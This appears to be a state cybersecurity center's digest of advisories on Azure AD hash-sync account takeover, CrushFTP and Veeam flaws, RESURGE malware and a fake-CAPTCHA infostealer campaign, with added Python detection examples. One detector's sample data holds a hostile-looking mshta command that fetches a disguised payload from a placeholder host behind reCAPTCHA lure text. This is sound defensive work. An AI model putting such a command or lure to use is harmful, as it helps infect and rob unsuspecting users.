Account Compromise Via Azure AD Password Hash Synchronization Login Method

The NJCCIC was recently notified of a cyber incident in which a threat actor compromised a user’s account credentials by targeting the Password Hash Synchronization (PHS) login method. Azure utilizes PHS to validate credentials and authenticate users without needing an additional Identity Provider (IdP). When PHS is enabled, Azure AD Connect uses the AD replication protocol to retrieve the password NT hash for every synced user. The hash is then rehashed and synced to Azure AD. Even if another authentication mechanism is used, PHS is enabled by default and will be used as a backup method during server outages. In a PHS attack, the threat actor exploits PHS and Azure AD Connect server functionality, often by intercepting connector credentials via man-in-the-middle attacks or injecting malicious code directly into the PHS process, allowing them to extract the domain users’ NT hashes.
In the recent incident, after compromising the account, the threat actor created a new computer name and established an alternate phone number as the account’s method for multi-factor authentication (MFA). Within a few hours of gaining access to the compromised account, the threat actors sent nearly 800 phishing emails to both internal and external accounts. These emails likely aimed to compromise additional user accounts for subsequent cyber threat activity; threat actors often compromise user accounts prior to launching ransomware attacks.
Recommendations
  • Ensure user accounts require MFA, favoring authentication apps and hardware tokens over SMS-based codes.
  • As advised by Microsoft, treat Azure AD Connect as a Tier 0 server.
  • Implement network segmentation to reduce the impact of a network compromise.
  • Monitor for man-in-the-middle attacks and atypical network and account behavior.
  • Follow the principle of least privilege to reduce the number of accounts with unnecessary access.
  • Revoke session tokens when an account is compromised and reduce the duration of valid session tokens.
  • Review additional technical analysis in the Sygnia blog post.
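The post-compromise sequence described above (new device registered, an alternate MFA phone number added, then hundreds of outbound messages within hours) is a detectable pattern in audit data. The following is an added example written for this digest, not code from the NJCCIC or Sygnia; it runs a simple correlation over constructed sample audit records. The activity names (`User registered security info`, `Add device`, `Send`) are the Azure AD audit and Exchange mailbox audit names I assume an export would carry; map them to whatever your SIEM produces.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Activity names assumed for this example (Azure AD audit log activities for
# device/MFA registration, Exchange mailbox audit operations for outbound mail).
MFA_CHANGE_OPS = {"User registered security info"}
DEVICE_OPS = {"Add device", "Add registered owner to device"}
SEND_OPS = {"Send", "SendAs", "SendOnBehalf"}

DEFAULT_WINDOW = timedelta(hours=6)   # "within a few hours" in the incident
SEND_THRESHOLD = 100                  # well below the ~800 seen, still anomalous


def build_sample_events():
    """Constructed sample audit records (not real logs).

    jdoe: new device, new MFA phone, then 120 outbound messages in ~3 hours.
    asmith: registers an authenticator app and sends a normal trickle of mail.
    """
    base = datetime.fromisoformat("2025-03-20T08:00:00")
    jdoe, asmith = "jdoe@example.invalid", "asmith@example.invalid"
    events = [
        {"time": base + timedelta(minutes=2), "user": jdoe,
         "op": "Add device", "detail": "DESKTOP-NEW01"},
        {"time": base + timedelta(minutes=5), "user": jdoe,
         "op": "User registered security info", "detail": "Phone: +1 555 0100"},
        {"time": base + timedelta(minutes=30), "user": asmith,
         "op": "User registered security info", "detail": "Authenticator app"},
    ]
    for i in range(120):
        events.append({"time": base + timedelta(minutes=40 + 1.5 * i), "user": jdoe,
                       "op": "Send", "detail": f"msg-{i}"})
    for i in range(5):
        events.append({"time": base + timedelta(hours=1, minutes=10 * i), "user": asmith,
                       "op": "Send", "detail": f"msg-{i}"})
    return events


def detect_post_compromise(events, window=DEFAULT_WINDOW, threshold=SEND_THRESHOLD):
    """Flag accounts whose MFA method change is followed by a burst of outbound mail.

    One alert per (user, MFA change) whose send count inside the window meets
    the threshold; any device registered within +/- window is attached as context.
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for change in (e for e in evs if e["op"] in MFA_CHANGE_OPS):
            t0 = change["time"]
            after = [e for e in evs if t0 <= e["time"] <= t0 + window]
            around = [e for e in evs if t0 - window <= e["time"] <= t0 + window]
            sends = sum(1 for e in after if e["op"] in SEND_OPS)
            if sends < threshold:
                continue
            alerts.append({
                "user": user,
                "mfa_change_time": t0.isoformat(),
                "mfa_detail": change["detail"],
                "sends_in_window": sends,
                "new_devices": [e["detail"] for e in around if e["op"] in DEVICE_OPS],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_post_compromise(build_sample_events()):
        print(alert)
```

The legitimate user who registers an authenticator app and keeps sending mail at a normal rate is not flagged; the rule fires only on the combination of an MFA change and a mail burst, which is what makes it useful as a trigger for the token-revocation step in the recommendations.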

A Vulnerability in CrushFTP Could Allow for Unauthorized Access – PATCH NOW

A vulnerability has been discovered in CrushFTP, which could allow for unauthorized access. CrushFTP is a proprietary multi-protocol, multi-platform file transfer server. The vulnerability is mitigated if the DMZ feature of CrushFTP is in place. Successful exploitation of this vulnerability could allow an attacker to remotely control the compromised server and execute remote code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

THREAT INTELLIGENCE:
There are currently no reports of the vulnerability being exploited in the wild. 

SYSTEMS AFFECTED:

  • CrushFTP v10 and v11 versions.

RISK:
Government:

  • Large and medium government entities: High
  • Small government entities: Medium

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium

Home users: Low

TECHNICAL SUMMARY:
A vulnerability has been discovered in CrushFTP, which could allow for unauthorized access. Details of the vulnerability are as follows:

Tactic: Initial Access (TA0001):

Technique: Exploit Public-Facing Application (T1190):

  • An exposed HTTP(S) port on CrushFTP’s web interface could lead to unauthenticated access. The vulnerability is mitigated if the DMZ feature of CrushFTP is in place.

Successful exploitation of this vulnerability could allow an attacker to remotely control the compromised server and execute remote code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

RECOMMENDATIONS:
We recommend the following actions be taken:

  • Apply appropriate updates provided by CrushFTP or other vendors which use this software to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.5: Perform Automated Vulnerability Scans of Internal Enterprise Assets: Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
    • Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
    • Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
    • Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
    • Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
  • Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
    • Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
    • Safeguard 5.5: Establish and Maintain an Inventory of Service Accounts: Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.
  • Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them. (M1016: Vulnerability Scanning)
    • Safeguard 16.13: Conduct Application Penetration Testing: Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing. Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. (M1030: Network Segmentation)
    • Safeguard 12.2: Establish and Maintain a Secure Network Architecture: Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.
  • Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)
    • Safeguard 10.5: Enable Anti-Exploitation Features: Enable anti-exploitation features on enterprise assets and software, where possible, such as Microsoft® Data Execution Prevention (DEP), Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protection (SIP) and Gatekeeper™.

REFERENCES:

CrushFTP:
https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
 
Bleeping Computer:
https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-unauthenticated-access-flaw-immediately/

CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2825

RESURGE Malware Associated with Ivanti Connect Secure

The Cybersecurity and Infrastructure Security Agency (CISA) has published a Malware Analysis Report (MAR) with analysis and associated detection signatures on a new malware variant CISA has identified as RESURGE. RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that alter its behavior. These commands:

  • Create a web shell, manipulate integrity checks, and modify files.
  • Enable the use of web shells for credential harvesting, account creation, password resets, and escalating permissions.
  • Copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image.

RESURGE is associated with the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. CVE-2025-0282 is a stack-based buffer overflow vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. CISA added CVE-2025-0282 to its Known Exploited Vulnerabilities Catalog on January 8.  
For more information on the abovementioned malware variants and YARA rules for detection, see: MAR-25993211.R1.V1.CLEAR.
CISA urges users and administrators to implement the following actions in addition to the Mitigation Instructions for CVE-2025-0282:

  • For the highest level of confidence, conduct a factory reset. For Cloud and Virtual systems, conduct a factory reset using an external known clean image of the device. See Ivanti’s Recommended Recovery Steps for more information, including how to conduct a factory reset.
  • Reset credentials of privileged and non-privileged accounts.
  • Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to Federal Civilian Executive Branch (FCEB) agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise.
  • Review access policies to temporarily revoke privileges/access for affected devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them.
  • Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions.
  • Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access.
For more guidance, see the Ivanti Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-0282, CVE-2025-0283).
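The krbtgt guidance above hinges on one condition: the second reset must not be performed until the first has replicated to every domain controller. The following is an added example, not part of the CISA or Ivanti guidance, that encodes that gate as a check over the krbtgt `pwdLastSet` value read from each DC. The DC names and timestamps are constructed; in practice you would collect the per-DC values yourself (for example with `Get-ADUser krbtgt -Properties pwdLastSet -Server <dc>` against each DC) and feed them to the function.

```python
from datetime import datetime


def check_second_krbtgt_reset(first_reset_time, pwd_last_set_by_dc):
    """Decide whether the second krbtgt reset may proceed.

    first_reset_time: the krbtgt pwdLastSet value observed on the DC where the
    first reset was performed.
    pwd_last_set_by_dc: {dc_name: pwdLastSet as read from that DC}.

    Returns (allowed, reasons). The second reset is allowed only when every DC
    reports exactly the first reset's pwdLastSet: an older value means the first
    reset has not replicated there yet; a newer value means a further reset has
    already happened and the two-password history is not in the expected state.
    """
    reasons = []
    lagging = sorted(dc for dc, t in pwd_last_set_by_dc.items() if t < first_reset_time)
    ahead = sorted(dc for dc, t in pwd_last_set_by_dc.items() if t > first_reset_time)
    if lagging:
        reasons.append("first reset not yet replicated to: " + ", ".join(lagging))
    if ahead:
        reasons.append("pwdLastSet newer than the first reset on: " + ", ".join(ahead)
                       + " (a further reset may already have occurred)")
    return (not reasons, reasons)


def sample_readings():
    """Constructed pwdLastSet readings from three DCs (not real data)."""
    first = datetime.fromisoformat("2025-03-21T09:00:00")
    before_replication = {
        "DC01": first,
        "DC02": first,
        "DC03": datetime.fromisoformat("2025-02-01T12:00:00"),  # still holds the old value
    }
    after_replication = {dc: first for dc in before_replication}
    return first, before_replication, after_replication


if __name__ == "__main__":
    first, before, after = sample_readings()
    print(check_second_krbtgt_reset(first, before))   # blocked: DC03 lagging
    print(check_second_krbtgt_reset(first, after))    # allowed
```

Reading the attribute from each DC individually (rather than letting the client pick one) is the point of the check: a single query can land on a DC that already has the new value while others are still behind.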

Microsoft 365 Copilot Training for IT

Join us at a free Microsoft 365 Copilot Training for IT to explore the fundamentals of using Copilot as your own AI assistant. Through expert-led demos, discover how Copilot helps boost collaboration, provides real-time insights, and streamlines workflows. During this tutorial, you’ll discover how to create prompts that deliver results, build foundational AI skills, and get the most out of Copilot in the apps you use every day. Engage with Microsoft experts to ask questions and get answers on how to apply AI to your daily tasks. You’ll gain skills to use Copilot to:

  • Synthesize your emails, meetings, and chats in Microsoft Teams related to specific IT topics, projects, or activities.
  • Perform data analysis and create summaries of product spec sheets to aid in decision making.
  • Develop project plan ideas for a new technology solution in a Microsoft Word document.
  • Draft an email about the proposed implementation plan in Microsoft Outlook.
  • Create a presentation using Microsoft PowerPoint to pitch the project plan.

Join us at an upcoming event:

Delivery Language: English
Closed Captioning Language: English
Event Delivery: Digital

  • Monday, April 07, 2025, 12:00 – 1:00 PM (GMT-05:00)
  • Tuesday, April 22, 2025, 10:00 – 11:00 AM (GMT-05:00)
  • Tuesday, May 06, 2025, 2:00 – 3:00 PM (GMT-05:00)
  • Tuesday, May 20, 2025, 4:00 – 5:00 PM (GMT-05:00)

Space is limited. Register for free today.

Fake CAPTCHA Malware Campaigns

The NJCCIC’s email security solution identified a fake CAPTCHA malware campaign sent to New Jersey State employees in an attempt to deliver the SectopRAT infostealer. The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges. In the background, the visited website copies a command to the target’s clipboard. The CAPTCHA prompts the target to verify their identity by opening a Windows Run dialog box and running the paste command.
The first part of the command triggers a legitimate Windows executable, mshta[.]exe, to fetch a malicious file from the specified domain and run it. The file type can be html, mp3, mp4, jpg, jpeg, swf, and others. This first part of the command is purposefully obfuscated so that the target only sees the last part of the pasted content stating “I am not a robot – reCAPTCHA Verification ID: ####” in the Windows Run dialog box, which prompts the user to click OK to verify their identity. If completed, the encoded PowerShell command runs in the background, and the target inadvertently downloads and executes SectopRAT.
Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries. A possible point of entry was an outdated PHP form that allowed threat actors to access the system and inject the malicious code. Additionally, the redirect links pointed to URLs of newly registered domains.
In a similar campaign, threat actors compromised a shared video service unique to auto dealerships in a supply chain attack. When active, auto dealership website visitors risk being infected with SectopRAT. Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.
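The behavior described above leaves a specific trace on the endpoint: `mshta.exe` launched from the user's shell with a remote URL whose file name does not look like an HTA, and a command line ending in the "I am not a robot" lure text. The following is an added detection example written for this digest, not code from the NJCCIC; it scores constructed process-creation records (placeholder `example.invalid` domains, no real infrastructure) against that pattern. Field names (`parent`, `image`, `cmdline`) are assumptions about your telemetry export.

```python
import re
from urllib.parse import urlparse

# Extensions the campaign used to disguise the fetched payload (from the report).
DISGUISE_EXTENSIONS = {"html", "mp3", "mp4", "jpg", "jpeg", "swf"}
# Lure text the target sees at the end of the pasted command.
LURE_MARKERS = ("not a robot", "recaptcha", "verification id")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Score one process-creation record for the fake-CAPTCHA mshta pattern.

    event: {"parent": ..., "image": ..., "cmdline": ...}
    Returns {"severity": "none" | "medium" | "high", "reasons": [...]}.
    """
    if _basename(event["image"]) != "mshta.exe":
        return {"severity": "none", "reasons": []}

    cmd = event["cmdline"]
    urls = URL_RE.findall(cmd)
    if not urls:
        return {"severity": "none", "reasons": []}   # local .hta; not this pattern

    reasons = ["mshta.exe launched with a remote URL"]
    severity = "medium"
    name = _basename(urlparse(urls[0]).path)
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if ext in DISGUISE_EXTENSIONS:
        reasons.append(f"remote payload disguised as .{ext}")
        severity = "high"
    if any(m in cmd.lower() for m in LURE_MARKERS):
        reasons.append("fake CAPTCHA lure text in the command line")
        severity = "high"
    if _basename(event["parent"]) == "explorer.exe":
        reasons.append("parent is explorer.exe (consistent with the Run dialog)")
    return {"severity": severity, "reasons": reasons}


def scan(events):
    """Severity per record, in input order."""
    return [classify(e)["severity"] for e in events]


def sample_events():
    """Constructed process-creation records (not real telemetry)."""
    return [
        {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
         "cmdline": 'mshta https://cdn.example.invalid/assets/verify.mp4 # "I am not a robot - reCAPTCHA Verification ID: 7391"'},
        {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
         "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
        {"parent": r"C:\Windows\System32\svchost.exe",
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
        {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
         "cmdline": "mshta.exe http://intranet.example.invalid/tools/report.hta"},
    ]


if __name__ == "__main__":
    for e in sample_events():
        print(classify(e))
```

A remote `.hta` launched from `explorer.exe` is kept at medium so that legitimate intranet HTA tools surface for review without being treated as the campaign; the disguised extension or the lure text is what raises a record to high. The same scoring can be applied to the user's Run dialog history, since the pasted command is recorded there as well.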

Recommendations
  • If you encounter a suspicious CAPTCHA verification challenge, refrain from visiting the website or taking further action.
  • Keep browsers and anti-virus/anti-malware software up to date.
  • Keep systems up to date and apply patches after appropriate testing.
  • Disable JavaScript in the browser before visiting unknown websites.
  • Website administrators are advised to remove the malicious code and ensure the website is patched and updated.
  • Verify all administrators and update the administrative credentials for the CMS platform.
  • Report malicious cyber activity to the FBI’s IC3 and the NJCCIC.

Register for the NIST NCCoE IoT Onboarding Open House Event!

REGISTRATION OPEN | Trusted IoT Onboarding Open House

Event Date/Time: April 17, 2025 | 8:30 a.m. – 4:00 p.m. 

Location: NCCoE at 9700 Great Seneca Highway, Rockville, MD 20850

The NIST National Cybersecurity Center of Excellence (NCCoE) invites you to join us for our in-person Open House Event to discuss trusted IoT Onboarding!

Untrusted provisioning of IoT device credentials to networks can expose organizations to significant cybersecurity risks. To mitigate these risks, implementing trusted, scalable, and automated mechanisms—starting with secure IoT device network-layer onboarding—is critical for properly safeguarding the IoT ecosystem.

The NIST NCCoE, in collaboration with 11 industry collaborators, has developed several technical build implementations using commercially available technologies such as Wi-Fi Easy Connect, Bootstrap Router Key Infrastructure (BRSKI), and Thread. These technologies accelerate the adoption of trusted network-layer onboarding and relevant best practices. This work is documented in NIST Special Publication (SP) 1800-36, which offers organizations guidance for step-by-step implementation.

During this event, join the NCCoE team and project collaborators to explore the technical implementation solutions outlined in SP 1800-36 and connect with leading experts in the field. This is a valuable opportunity for those interested in advancing IoT security, and our team looks forward to your participation and insights.

The deadline to register is April 10, 2025. Registration is for in-person attendance only. There is no cost to attend.

View Agenda and Register

A Vulnerability in Veeam Backup & Replication Could Allow for Arbitrary Code Execution – PATCH NOW

A vulnerability has been discovered in Veeam Backup & Replication, which could allow for arbitrary code execution. Veeam Backup & Replication is a comprehensive data protection and disaster recovery solution. With Veeam Backup & Replication, you can create image-level backups of virtual, physical and cloud machines and restore from them. Exploitation of this vulnerability requires authentication to the domain but could result in arbitrary code execution. Data such as backups and images could be compromised.

THREAT INTELLIGENCE:
There are currently no reports of this vulnerability being exploited in the wild.

SYSTEMS AFFECTED:

  • Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds. 

RISK:
Government:

  • Large and medium government entities: High
  • Small government entities: Medium 

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium 

Home users: Low 

TECHNICAL SUMMARY:
A vulnerability has been discovered in Veeam Backup & Replication, which could allow for arbitrary code execution. Details of the vulnerability are as follows: 

Tactic: Execution (TA0002):

Technique: Software Deployment Tools (T1072):

  • A vulnerability in Veeam Backup & Replication which could allow remote code execution (RCE) by authenticated domain users. The vulnerability affects Backup & Replication systems that are domain joined. Veeam explicitly mentions that having domain-joined backup servers is against their security and compliance best practices. However, it is acknowledged that this configuration might still be relatively common in practice. (CVE-2025-23120)

Successful exploitation of this vulnerability requires authentication to the domain but could result in arbitrary code execution. Data such as backups and images could be compromised. 
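Two details above drive the patching order: the affected range is "12.3.0.310 and all earlier version 12 builds", and the exploitable configuration is a domain-joined backup server. The following is an added example written for this digest, not Veeam's or Rapid7's code; it parses version strings as integer tuples (a plain string comparison would rank a hypothetical 12.10 build below 12.3) and triages a constructed inventory. Host names and the non-12.3 version numbers are constructed.

```python
import re

# From the advisory: 12.3.0.310 and all earlier version 12 builds are affected.
LAST_AFFECTED_BUILD = (12, 3, 0, 310)


def parse_version(text):
    """Turn '12.3.0.310' into (12, 3, 0, 310); short strings are zero-padded.

    Compare as integer tuples, never as strings: '12.10.0.1' sorts before
    '12.3.0.310' as text but would be the newer build.
    """
    parts = tuple(int(p) for p in re.findall(r"\d+", text))
    if not parts:
        raise ValueError(f"no version number in {text!r}")
    return (parts + (0, 0, 0, 0))[:4]


def in_affected_range(version):
    """True for builds the advisory lists as affected (version 12 up to 12.3.0.310).

    Other major versions are outside this advisory's scope, not declared safe.
    """
    v = parse_version(version)
    return v[0] == 12 and v <= LAST_AFFECTED_BUILD


def triage(hosts):
    """Order patching: domain-joined affected servers first (the configuration the
    advisory says is exploitable), then affected servers that are not domain joined.

    hosts: [{"name": ..., "version": ..., "domain_joined": bool}]
    """
    findings = []
    for h in hosts:
        if not in_affected_range(h["version"]):
            continue
        findings.append({
            "name": h["name"],
            "version": h["version"],
            "priority": "critical" if h["domain_joined"] else "high",
        })
    return sorted(findings, key=lambda f: (f["priority"] != "critical", f["name"]))


def sample_hosts():
    """Constructed inventory (not real hosts; 12.10.0.1 is a made-up future build)."""
    return [
        {"name": "vbr-prod-01", "version": "12.3.0.310", "domain_joined": True},
        {"name": "vbr-prod-02", "version": "12.2.0.1", "domain_joined": False},
        {"name": "vbr-lab-01", "version": "12.10.0.1", "domain_joined": True},
        {"name": "vbr-old-01", "version": "11.0.0.0", "domain_joined": True},
    ]


if __name__ == "__main__":
    for finding in triage(sample_hosts()):
        print(finding)
```

The non-domain-joined server still appears in the output: the advisory's affected range covers it, and only the exploitability condition differs. The version 11 host is omitted because this advisory says nothing about it, which is why the function is named for the advisory's range rather than "is vulnerable".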

RECOMMENDATIONS:
We recommend the following actions be taken:

  • Apply appropriate updates provided by Veeam or other vendors which use this software to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.5: Perform Automated Vulnerability Scans of Internal Enterprise Assets: Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
    • Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
    • Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
    • Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
    • Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
       
  • Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc. (Mitigation M1015: Active Directory Configuration)
    • Safeguard 4.1: Establish and Maintain a Secure Configuration Process: Establish and maintain a secure configuration process for enterprise assets (end-user devices, including portable and mobile, non-computing/IoT devices, and servers) and software (operating systems and applications). Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 18.5: Perform Periodic Internal Penetration Tests: Perform periodic internal penetration tests based on program requirements, no less than annually. The testing may be clear box or opaque box.
    • Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
       
  • Manage the creation, modification, use, and permissions associated to user accounts. (Mitigation M1018: User Account Management)
    • Safeguard 6.1: Establish an Access Granting Process: Establish and follow a process, preferably automated, for granting access to enterprise assets upon new hire, rights grant, or role change of a user.
    • Safeguard 6.2: Establish an Access Revoking Process: Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts immediately upon termination, rights revocation, or role change of a user. Disabling accounts, instead of deleting accounts, may be necessary to preserve audit trails.
    • Safeguard 6.8: Define and Maintain Role-Based Access Control: Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.
    • Safeguard 15.7: Securely Decommission Service Providers: Securely decommission service providers. Example considerations include user and service account deactivation, termination of data flows, and secure disposal of enterprise data within service provider systems.
       
  • Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. (Mitigation M1030: Network Segmentation)
    • Safeguard 3.12: Segment Data Processing and Storage Based on Sensitivity: Segment data processing and storage based on the sensitivity of the data. Do not process sensitive data on enterprise assets intended for lower sensitivity data.
    • Safeguard 4.4: Implement and Manage a Firewall on Servers: Implement and manage a firewall on servers, where supported. Example implementations include a virtual firewall, operating system firewall, or a third-party firewall agent.
    • Safeguard 12.2: Establish and Maintain a Secure Network Architecture: Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.
    • Safeguard 12.8: Establish and Maintain Dedicated Computing Resources for All Administrative Work: Establish and maintain dedicated computing resources, either physically or logically separated, for all administrative tasks or tasks requiring administrative access. The computing resources should be segmented from the enterprise’s primary network and not be allowed internet access.
    • Safeguard 16.8: Separate Production and Non-Production Systems: Maintain separate environments for production and non-production systems.
       
  • Use two or more pieces of evidence to authenticate to a system, such as username and password in addition to a token from a physical smart card or token generator. (Mitigation M1032: Multi-factor Authentication)
    • Safeguard 6.4: Require MFA for Remote Network Access: Require MFA for remote network access.
    • Safeguard 6.5: Require MFA for Administrative Access: Require MFA for all administrative access accounts, where supported, on all enterprise assets, whether managed on-site or through a third-party provider.
       

REFERENCES:

Veeam:
https://www.veeam.com/kb4724 

Rapid7:
https://www.rapid7.com/blog/post/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/

CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23120

Microsoft 365 Copilot Training for IT

Join us at Microsoft 365 Copilot Training for IT to learn how to use Microsoft Copilot to simplify your everyday tasks. During this free event, discover how Copilot can help you enhance efficiency, simplify complex tasks, and optimize technical workflows. You’ll be able to:

  • Use Copilot to summarize the information in a product spec document for a network security product and create a project plan to implement the product.
  • Use Copilot in PowerPoint to create and customize a business presentation based on the product plan that you created for the new network security product.
  • Use Copilot in Word to modify a technical implementation report for a customer who is planning to install your new network security product.
  • Use Copilot in Outlook to draft an email that provides highlights from the technical implementation report that you created for the customer who is installing your new network security product.

Join us at an upcoming event:

Delivery Language: English
Closed Captioning Language: English
Event Delivery: Digital

  • Tuesday, March 25, 2025, 4:00 – 5:00 PM (GMT-05:00)
  • Monday, April 07, 2025, 12:00 – 1:00 PM (GMT-05:00)
